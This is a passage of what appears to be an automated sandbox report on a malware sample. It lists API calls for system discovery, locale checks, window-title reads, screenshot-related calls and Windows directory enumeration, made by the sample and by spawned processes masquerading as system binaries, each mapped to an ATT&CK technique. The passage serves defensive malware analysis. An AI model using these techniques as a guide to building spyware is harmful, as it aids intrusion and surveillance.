9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8875f8e5210000a0fd7f9a5cee7600f0fd7f60c6120044a0fd7f00000000400000003f0000002000000000a0fd7f54c61200c15cee766082f5762000000000a0fd7f9a5cee7600f0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00002060)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bbf01d01bbf010016bf010000bc01e414bf0188000000880000001768ed769817bf01ff2bed76918ce876a41bbf01ac011d0000001d000000bc01c06dbc011000ac00fb040000c06dbc015016bf0110000000000000001100a700fb040000c06dbc01 (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bd001d01bd0010016d0010000cd01e414d00188000000880000001768ed769817d001ff2bed76b387e876a41bd001ac016000000060000000cd01c06dcd011200a2003e040000c06dcd015016d001100000000000000013009d003e040000c06dcd01 (UID: 00000000-00005952)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21b3401d01b34010016340100003101e414340188000000880000001768ed7698173401ff2bed76737cf776a41b3401ac012e0000002e0000003101c06d310114009800b1020000c06d310150163401100000000000000015009300b1020000c06d3101 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8875d0ce320000f0fd7f9a5cee7600e0fd7f60c6120044f0fd7f00000000400000003f0000001f00000000f0fd7f54c61200c15cee766082f5761f00000000f0fd7f9a5cee7600e0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00006124)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a00100005a1b0102581b0102881501020000fe016c14010288000000880000001768ed7620170102ff2bed761173f7762c1b0102ac012e0000002e000000fe01905bfe011000ac0090050000905bfe01d815010210000000000000001100a70090050000905bfe01 (UID: 00000000-00004180)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bd001d01bd0010016d0010000cd01e414d00188000000880000001768ed769817d001ff2bed766f73f776a41bd001ac011800000018000000cd01c06dcd01140098001d000000c06dcd015016d0011000000000000000150093001d000000c06dcd01 (UID: 00000000-00004284)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21be601d01be6010016e6010000e301e414e60188000000880000001768ed769817e601ff2bed76ad75f776a41be601ac011500000015000000e301c06de3011200a2003c040000c06de3015016e601100000000000000013009d003c040000c06de301 (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a00100005a1b0402581b040288150402000001026c14040288000000880000001768ed7620170402ff2bed766f2df5762c1b0402ac0130000000300000000102905b01021000ac00fb040000905b0102d815040210000000000000001100a700fb040000905b0102 (UID: 00000000-00004136)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bdc01d01bdc010016dc010000d901e414dc0188000000880000001768ed769817dc01ff2bed762c6bf776a41bdc01ac012800000028000000d901c06dd9011200a20090050000c06dd9015016dc01100000000000000013009d0090050000c06dd901 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb887550ce2c0000f0fd7f9a5cee7600e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cee766082f5762000000000f0fd7f9a5cee7600e0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21b6600d01b66000016660000006300e414660088000000880000001768ed7698176600ff2bed76506ff776a41b6600ac0126000000260000006300c06d63001200a2003c040000c06d630050166600100000000000000013009d003c040000c06d6300 (UID: 00000000-00006048)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bf301d01bf3010016f3010000f001e414f30188000000880000001768ed769817f301ff2bed76bb63f776a41bf301ac012c0000002c000000f001c06df0011400980048030000c06df0015016f30110000000000000001500930048030000c06df001 (UID: 00000000-00003928)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bc301d01bc3010016c3010000c001e414c30188000000880000001768ed769817c301ff2bed768766f776a41bc301ac011600000016000000c001c06dc0011400980046030000c06dc0015016c30110000000000000001500930046030000c06dc001 (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8875808f1a0000f0fd7f9a5cee7600e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cee766082f5762000000000f0fd7f9a5cee7600e0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00004084)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21b3a00d01b3a0000163a0000003700e4143a0088000000880000001768ed7698173a00ff2bed76865bf776a41b3a00ac0124000000240000003700c06d37001200a2007c030000c06d370050163a00100000000000000013009d007c030000c06d3700 (UID: 00000000-00003800)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a00100005a1b3501581b350188153501000032016c14350188000000880000001768ed7620173501ff2bed76515bf7762c1b3501ac0120000000200000003201905b32011000ac0090050000905b3201d815350110000000000000001100a70090050000905b3201 (UID: 00000000-00003456)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21bc701d01bc7010016c7010000c401e414c70188000000880000001768ed769817c701ff2bed769852f776a41bc701ac016000000060000000c401c06dc40114009800f1010000c06dc4015016c701100000000000000015009300f1010000c06dc401 (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21b4701d01b47010016470100004401e414470188000000880000001768ed7698174701ff2bed762557f776a41b4701ac012a0000002a0000004401c06d440114009800ef010000c06d440150164701100000000000000015009300ef010000c06d4401 (UID: 00000000-00004316)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059ed7698010000a0010000d21b4401d01b44010016440100004101e414440188000000880000001768ed7698174401ff2bed763b4bf776a41b4401ac011e0000001e0000004101c06d41011400980084020000c06d41015016440110000000000000001500930084020000c06d4101 (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb887510e722000070fd7f9a5cee7600f0fd7f60c612004470fd7f00000000400000003f0000001f0000000070fd7f54c61200c15cee766082f5761f0000000070fd7f9a5cee7600f0fd7f78c612005789ed768083f5761317ef74d8eb8875 (UID: 00000000-00001800)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005884)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002060)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005952)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006124)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004180)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004284)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004136)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006048)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003928)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004084)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003800)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015b801eea3a0720016b80102000000c8322300609ba0720c16b8017d9ba072328a9a72040b220097a8a0720200000000000000b80a2200c83223000816b80194f9120094f912003ff29872f015b801c3a5a0720016b801c8322300c0e59672b80a220034000000d01bb8010000b501e02fb801c0e59672d8f91200dcf91200000000004e0200009cfa120034000000340000001768ed76d81bb80100000000435ced76ccace8760016b8012403b5010000b5015001b50193aba07200000000c06db5015c15b80100000000c83223004e02000000fa12005001b501b7aba072 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000c8091f0068da1200b3447e6881d0ee7500000000000000000000000000000000000000000000000014010000000000000000000000000000659ea29d5f1a999d24df12005ecbec751401000000000000005dea7580e112000e5dea7518dd1200dcaaee75010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b69ea29df8da12006d82917504d7230004010000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610063003800640065003400320063003100630031006200370035003100380030003500640063003500340063003500300039006600620038003200650062003100340032006400620035006600300063006600350061003100630039003200660039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bed76f093e876d8eb8875ac011f0000001f0027003900010000000000000000000000000000000000000028003400010000000000000000000000000000000000000038701f0000000000200000000000000000000000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff29003900ad000000620bec750000000038701f000000000050000000140b240002000000b88f2100000000000100000898a3220060741f00380bec752cd9120002000000e0d912003f08df7602000000b88f2100000000000100001888fbde76d0d91200c81cee75a6db120095fbde7604db1200b88f21000000000000000000000000008cda120000001f007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600429ea29d4cda12006d82917504d7230004010000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002a97a29d64d312006d82917514c0250004010000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000c04e2400b8cf1200b3447e6881d0ee7500000000000000000000000000000000000000000000000038010000000000000000000000000000b58ba29d2f0f999d74d412005ecbec753801000000000000005dea75d0d612000e5dea7568d21200dcaaee7501000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036004694a29d48d012006d829175dcc5250004010000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f8c7250038701f000000000050000000eccf120000000000204b2100286d1f0002000000b88f2100000000000100000870ce1200286d1f00bcc7f576c0c7f5760a000000e00f000000001f00c8c52500f83b0000ff07000000001f00000000007f070000c4001f0008301f00432500005ccf120067e5ea7600001f00c8c525000000000000001f00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600128ba29d9ccf12006d829175dcc5250004010000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000250088c5250083c52500000000000000000000001f0000000001e4cb12000000000048d9120095e1e97678441700feffffff435ced765059ed76aa000000b800000082c5250080c525006ccd1200a4d11200000000000000000000000000000000000000000000000000a01c000000001f001c5cec7660d8ee74ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096eded76aac52500a06ac374860000006ccd1200a4d112000000000086008800a06ac3746ccd1200916cc374aac52500a06ac374a06ac374dcd1120002020000 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005884)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005884)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002060)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005952)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006124)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004180)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004284)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004136)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006048)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003928)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004084)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003800)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003456)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004316)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003820)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003256)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004152)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003232)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003424)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003924)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006080)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"IsWow64Process\" with parameter \"5884\" - (UID: 00000000-00005884)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5856\" - (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"2060\" - (UID: 00000000-00002060)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"6124\" - (UID: 00000000-00006124)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5984\" - (UID: 00000000-00005984)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"4084\" - (UID: 00000000-00004084)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"1800\" - (UID: 00000000-00001800)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4152\" - (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005884)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetWindowTextA\" (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1b01076c\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"33010a7f\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"33010a7f\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": 